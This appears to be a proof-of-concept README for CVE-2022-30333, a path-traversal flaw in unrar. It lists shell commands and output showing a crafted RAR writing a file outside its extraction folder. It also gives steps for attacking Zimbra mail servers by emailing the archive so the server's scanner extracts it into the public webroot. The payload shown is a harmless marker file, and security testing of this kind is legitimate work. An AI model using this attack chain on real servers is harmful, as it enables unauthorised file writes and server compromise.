Awesome
CVE-2022-30333-POC
Sample file to test CVE-2022-30333
-
Sample.rar : if you want to test on Linux. When you extract, it create trav in ../../tmp/traversed. Please be sure that directory ../../tmp/traversed exists before extracting Sample.rar
-
exp.rar : if you want to test on Zimbra Mail server. When you extract, it create moo.txt in /opt/zimbra/jetty_base/webapps/zimbra/public/. You can access this file at https://zimbra_mail_domain/public/moo.txt
EXPLOITATION STEPS
Testing on Linux
mkdir ../../tmp/traversed (the destination folder must exsist before unrar)
ls -la ../../tmp/traversed/
total 8
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul 4 02:44 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul 4 02:40 ..
unrar x exp.rar
UNRAR 6.10 beta 1 freeware Copyright (c) 1993-2021 Alexander Roshal
Corrupt header is found
sym - the file header is corrupt
Extracting from exp.rar
Corrupt header is found
sym - the file header is corrupt
Extracting sym OK
Extracting sym/trav OK
Total errors: 4
ls -la ../../tmp/traversed/
total 12
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul 4 02:47 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul 4 02:40 ..
-rw-rw-r-- 1 ubuntu ubuntu 14 Jul 4 02:34 trav
cat ../../tmp/traversed/trav
"traversed"
Testing on Zimbra
- Create an email and attach malicious rar file then send to Zimbra email address. This rar file will be extracted while being analyzed with Amavisd.
- The moo.txt should be at: /opt/zimbra/jetty_base/webapps/zimbra/public/moo.txt or https://zimbra_mail_domain/public/moo.txt
REFERENCES
- Vietnamese blog from DEV2SEC
- English blog from Sonarsource
- Special thanks to mrlihd for helping me rebuild attack-chain in Zimbra